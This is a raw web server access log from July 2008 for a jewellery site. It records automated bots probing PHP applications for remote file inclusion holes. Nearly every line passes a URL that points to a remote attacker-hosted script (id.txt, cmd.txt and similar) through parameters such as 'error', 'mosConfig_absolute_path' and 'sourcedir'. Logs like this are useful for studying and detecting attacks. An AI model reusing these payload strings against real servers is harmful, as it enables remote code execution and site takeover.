195.93.201.102 - - [30/Jul/2008:22:34:19 -0700] "GET /errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
195.93.201.102 - - [30/Jul/2008:22:34:19 -0700] "GET /logs/errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
74.6.8.97 - - [30/Jul/2008:22:35:08 -0700] "GET /logs/access.log HTTP/1.0" 200 75726 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sojewels.com"
64.22.89.194 - - [30/Jul/2008:22:35:45 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.4tuneworld.co.uk/dump/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
72.232.71.106 - - [30/Jul/2008:22:37:07 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.4tuneworld.co.uk/dump/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
64.246.52.46 - - [30/Jul/2008:22:38:30 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
64.246.52.46 - - [30/Jul/2008:22:38:30 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
64.246.52.46 - - [30/Jul/2008:22:38:30 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
64.22.89.194 - - [30/Jul/2008:22:38:45 -0700] "GET ///vwar/backup/errors.php?error=http://www.4tuneworld.co.uk/dump/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
64.22.89.194 - - [30/Jul/2008:22:38:45 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.4tuneworld.co.uk/dump/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.sojewels.com"
58.69.172.67 - - [30/Jul/2008:22:38:55 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.onconova.com/.../yyy??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
58.69.172.67 - - [30/Jul/2008:22:38:55 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.onconova.com/.../yyy??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
58.69.172.67 - - [30/Jul/2008:22:38:56 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.onconova.com/.../yyy??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
64.246.52.46 - - [30/Jul/2008:22:39:08 -0700] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
64.246.52.46 - - [30/Jul/2008:22:39:08 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
64.246.52.46 - - [30/Jul/2008:22:39:09 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
72.232.71.106 - - [30/Jul/2008:22:40:41 -0700] "GET ///vwar/backup/errors.php?error=http://www.4tuneworld.co.uk/dump/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
72.232.71.106 - - [30/Jul/2008:22:40:41 -0700] "GET /logs///vwar/backup/errors.php?error=http://www.4tuneworld.co.uk/dump/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.sojewels.com"
193.207.106.54 - - [30/Jul/2008:22:42:20 -0700] "GET /logs/access.log/errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
193.207.106.54 - - [30/Jul/2008:22:42:20 -0700] "GET /logs/errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
193.207.106.54 - - [30/Jul/2008:22:42:20 -0700] "GET /errors.php?error=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:22:43:22 -0700] "GET /logs/access.log/errors.php?error=http://www.veneno.t35.com/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:22:43:22 -0700] "GET /errors.php?error=http://www.veneno.t35.com/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:22:43:23 -0700] "GET /logs/errors.php?error=http://www.veneno.t35.com/cmdbuscador.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
80.67.26.157 - - [30/Jul/2008:22:45:43 -0700] "GET /logs/access.log/errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
80.67.26.157 - - [30/Jul/2008:22:45:43 -0700] "GET /errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
80.67.26.157 - - [30/Jul/2008:22:45:43 -0700] "GET /logs/errors.php?error=http://paz.bistum-wuerzburg.de/wp-admin/import/rss/licence.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
74.52.139.226 - - [30/Jul/2008:22:51:02 -0700] "GET /logs/access.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
74.52.139.226 - - [30/Jul/2008:22:51:02 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
74.52.139.226 - - [30/Jul/2008:22:51:02 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
216.180.241.37 - - [30/Jul/2008:22:52:46 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
64.246.52.46 - - [30/Jul/2008:22:54:21 -0700] "GET /logs/access_080131.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
64.246.52.46 - - [30/Jul/2008:22:55:32 -0700] "GET /logs/access_080331.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
216.180.241.37 - - [30/Jul/2008:22:59:03 -0700] "GET /logs/access.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
216.180.241.37 - - [30/Jul/2008:22:59:03 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
74.6.8.97 - - [30/Jul/2008:22:59:09 -0700] "GET /logs/access_071031.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sojewels.com"
74.6.8.97 - - [30/Jul/2008:23:03:36 -0700] "GET /logs/access_071201.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sojewels.com"
64.246.52.46 - - [30/Jul/2008:23:04:10 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
64.246.52.46 - - [30/Jul/2008:23:04:10 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
64.246.52.46 - - [30/Jul/2008:23:04:11 -0700] "GET /logs/access.log/errors.php?error=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
64.246.52.46 - - [30/Jul/2008:23:04:11 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
64.246.52.46 - - [30/Jul/2008:23:04:11 -0700] "GET /errors.php?error=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
64.246.52.46 - - [30/Jul/2008:23:04:11 -0700] "GET /logs/errors.php?error=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.sojewels.com"
218.188.197.136 - - [30/Jul/2008:23:04:18 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
74.6.8.97 - - [30/Jul/2008:23:10:22 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sojewels.com"
218.188.197.136 - - [30/Jul/2008:23:14:01 -0700] "GET /logs/access.log/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
218.188.197.136 - - [30/Jul/2008:23:14:01 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
201.36.250.17 - - [30/Jul/2008:23:17:26 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.sojewels.com"
201.36.250.17 - - [30/Jul/2008:23:17:26 -0700] "GET /logs/access_080331.log//admin/spaw/spaw_control.class.php?spaw_root=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.sojewels.com"
201.36.250.17 - - [30/Jul/2008:23:17:26 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://dpfbrasil.net63.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.sojewels.com"
210.245.166.92 - - [30/Jul/2008:23:26:22 -0700] "GET /logs/access_080501.log//atom.php5?page=http://www.adoradores.kit.net/general? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
74.6.8.97 - - [30/Jul/2008:23:35:31 -0700] "GET /logs/access_071031.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sojewels.com"
80.231.0.98 - - [30/Jul/2008:23:40:10 -0700] "GET /index2.php?x=http://geocities.com/rais_corp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
62.149.18.4 - - [30/Jul/2008:23:43:50 -0700] "GET /errors.php?error=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
82.194.67.123 - - [30/Jul/2008:23:44:18 -0700] "GET /logs/access_080131.log//poc.php?sourcedir=http://www.paulofreirezentrum.at/inc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
82.194.67.123 - - [30/Jul/2008:23:44:18 -0700] "GET //poc.php?sourcedir=http://www.paulofreirezentrum.at/inc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
82.194.67.123 - - [30/Jul/2008:23:44:18 -0700] "GET /logs//poc.php?sourcedir=http://www.paulofreirezentrum.at/inc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
82.194.67.123 - - [30/Jul/2008:23:44:26 -0700] "GET /logs/access_080131.log//poc.php?sourcedir=http://www.icamotorediciones.es/administrator/includes/js/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
82.194.67.123 - - [30/Jul/2008:23:44:26 -0700] "GET //poc.php?sourcedir=http://www.icamotorediciones.es/administrator/includes/js/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
82.194.67.123 - - [30/Jul/2008:23:44:26 -0700] "GET /logs//poc.php?sourcedir=http://www.icamotorediciones.es/administrator/includes/js/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
62.112.193.46 - - [30/Jul/2008:23:45:22 -0700] "GET /logs/access.log/errors.php?error=http://shloma.ru/90033ac0577c90356d915788464749b3/.../id4.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
62.112.193.46 - - [30/Jul/2008:23:45:22 -0700] "GET /errors.php?error=http://shloma.ru/90033ac0577c90356d915788464749b3/.../id4.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
62.112.193.46 - - [30/Jul/2008:23:45:22 -0700] "GET /logs/errors.php?error=http://shloma.ru/90033ac0577c90356d915788464749b3/.../id4.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
62.112.193.46 - - [30/Jul/2008:23:45:23 -0700] "GET /errors.php?error=http://shloma.ru/90033ac0577c90356d915788464749b3/.../id4.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
62.149.18.4 - - [30/Jul/2008:23:46:27 -0700] "GET /logs/access.log/errors.php?error=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
62.149.18.4 - - [30/Jul/2008:23:46:27 -0700] "GET /errors.php?error=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
62.149.18.4 - - [30/Jul/2008:23:46:27 -0700] "GET /logs/errors.php?error=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
70.84.182.98 - - [30/Jul/2008:23:47:31 -0700] "GET /logs/access.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
70.84.182.98 - - [30/Jul/2008:23:47:31 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
70.84.182.98 - - [30/Jul/2008:23:47:32 -0700] "GET /logs/access.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
70.84.182.98 - - [30/Jul/2008:23:47:33 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
201.130.79.130 - - [30/Jul/2008:23:47:39 -0700] "GET /logs/access.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
201.130.79.130 - - [30/Jul/2008:23:47:39 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
62.149.18.4 - - [30/Jul/2008:23:47:48 -0700] "GET /logs/access.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
62.149.18.4 - - [30/Jul/2008:23:47:48 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
62.149.18.4 - - [30/Jul/2008:23:48:03 -0700] "GET /logs/access.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
62.149.18.4 - - [30/Jul/2008:23:48:04 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
62.149.18.4 - - [30/Jul/2008:23:48:04 -0700] "GET /logs/access.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
62.149.18.4 - - [30/Jul/2008:23:48:04 -0700] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
62.149.18.4 - - [30/Jul/2008:23:48:04 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
62.149.18.4 - - [30/Jul/2008:23:48:05 -0700] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
70.84.182.98 - - [30/Jul/2008:23:48:30 -0700] "GET /logs/access.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
70.84.182.98 - - [30/Jul/2008:23:48:31 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
70.84.182.98 - - [30/Jul/2008:23:48:31 -0700] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
62.149.18.4 - - [30/Jul/2008:23:48:34 -0700] "GET /logs/access.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
62.149.18.4 - - [30/Jul/2008:23:48:34 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.sojewels.com"
70.84.182.98 - - [30/Jul/2008:23:48:39 -0700] "GET /logs/access.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
70.84.182.98 - - [30/Jul/2008:23:48:40 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
70.84.182.98 - - [30/Jul/2008:23:48:40 -0700] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
201.130.79.130 - - [30/Jul/2008:23:48:59 -0700] "GET /logs/access.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
201.130.79.130 - - [30/Jul/2008:23:48:59 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
201.130.79.130 - - [30/Jul/2008:23:48:59 -0700] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
62.149.18.4 - - [30/Jul/2008:23:50:15 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
62.149.18.4 - - [30/Jul/2008:23:50:21 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
70.84.182.98 - - [30/Jul/2008:23:51:01 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
70.84.182.98 - - [30/Jul/2008:23:51:10 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
62.149.18.4 - - [30/Jul/2008:23:53:00 -0700] "GET ///vwar/backup/errors.php?error=http://inside-asia.com//templates/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
201.130.79.130 - - [30/Jul/2008:23:53:08 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
209.97.201.148 - - [30/Jul/2008:23:53:44 -0700] "GET /logs/access.log/?sourcedir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
209.97.201.148 - - [30/Jul/2008:23:53:44 -0700] "GET /?sourcedir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.sojewels.com"
209.97.201.148 - - [30/Jul/2008:23:53:44 -0700] "GET /logs/?sourcedir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 200 1796 "-" "libwww-perl/5.79" "www.sojewels.com"
69.64.48.146 - - [30/Jul/2008:23:53:46 -0700] "GET /logs/access.log/?sourcedir=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
69.64.48.146 - - [30/Jul/2008:23:53:46 -0700] "GET /?sourcedir=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.sojewels.com"
69.64.48.146 - - [30/Jul/2008:23:53:46 -0700] "GET /logs/?sourcedir=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 200 1796 "-" "libwww-perl/5.79" "www.sojewels.com"
201.238.195.13 - - [30/Jul/2008:23:53:56 -0700] "GET /logs/access.log/?sourcedir=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
201.238.195.13 - - [30/Jul/2008:23:53:57 -0700] "GET /?sourcedir=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "www.sojewels.com"
201.238.195.13 - - [30/Jul/2008:23:53:57 -0700] "GET /logs/?sourcedir=http://www.usedomonline.de/hpmaker/id2.txt?? HTTP/1.1" 200 1796 "-" "libwww-perl/5.79" "www.sojewels.com"
212.50.0.218 - - [30/Jul/2008:23:54:56 -0700] "GET /logs/access.log/?sourcedir=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sojewels.com"
212.50.0.218 - - [30/Jul/2008:23:54:56 -0700] "GET /?sourcedir=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.sojewels.com"
212.50.0.218 - - [30/Jul/2008:23:54:57 -0700] "GET /logs/?sourcedir=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 200 1796 "-" "libwww-perl/5.803" "www.sojewels.com"
59.106.19.213 - - [30/Jul/2008:23:55:27 -0700] "GET /?sourcedir=http://www.cepeduc.com/cepa/images/M.images/idscan8?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.sojewels.com"
59.106.19.213 - - [30/Jul/2008:23:55:27 -0700] "GET /logs/access.log/?sourcedir=http://www.cepeduc.com/cepa/images/M.images/idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
59.106.19.213 - - [30/Jul/2008:23:55:27 -0700] "GET /logs/?sourcedir=http://www.cepeduc.com/cepa/images/M.images/idscan8?? HTTP/1.1" 200 1796 "-" "libwww-perl/5.805" "www.sojewels.com"
70.84.182.98 - - [30/Jul/2008:23:55:50 -0700] "GET /?sourcedir=http://saltgum.com/test.txt? HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.sojewels.com"
70.84.182.98 - - [30/Jul/2008:23:55:50 -0700] "GET /logs/?sourcedir=http://saltgum.com/test.txt? HTTP/1.1" 200 1796 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.sojewels.com"
89.111.179.12 - - [30/Jul/2008:23:57:35 -0700] "GET /logs/access.log/?sourcedir=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
89.111.179.12 - - [30/Jul/2008:23:57:35 -0700] "GET /?sourcedir=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.sojewels.com"
89.111.179.12 - - [30/Jul/2008:23:57:36 -0700] "GET /logs/?sourcedir=http://www.phanom.ac.th/msnlist/id.txt??? HTTP/1.1" 200 1796 "-" "libwww-perl/5.805" "www.sojewels.com"
209.97.201.148 - - [30/Jul/2008:23:57:53 -0700] "GET /logs/access_080131.log/?sourcedir=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
80.231.0.98 - - [30/Jul/2008:23:59:27 -0700] "GET /logs/access.log/index2.php?x=http://geocities.com/rais_corp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
80.231.0.98 - - [30/Jul/2008:23:59:27 -0700] "GET /logs/index2.php?x=http://geocities.com/rais_corp/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sojewels.com"
194.24.180.40 - - [31/Jul/2008:00:00:31 -0700] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.sojewels.com"
194.24.180.40 - - [31/Jul/2008:00:00:31 -0700] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.sojewels.com"
194.24.180.40 - - [31/Jul/2008:00:00:32 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.sojewels.com"
59.106.19.213 - - [31/Jul/2008:00:02:39 -0700] "GET /logs/access_080131.log/?sourcedir=http://www.cepeduc.com/cepa/images/M.images/idscan8?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sojewels.com"
69.93.189.130 - - [31/Jul/2008:00:03:21 -0700] "GET /logs/access.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
69.93.189.130 - - [31/Jul/2008:00:03:21 -0700] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://mabat.edumining.info/oye.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sojewels.com"
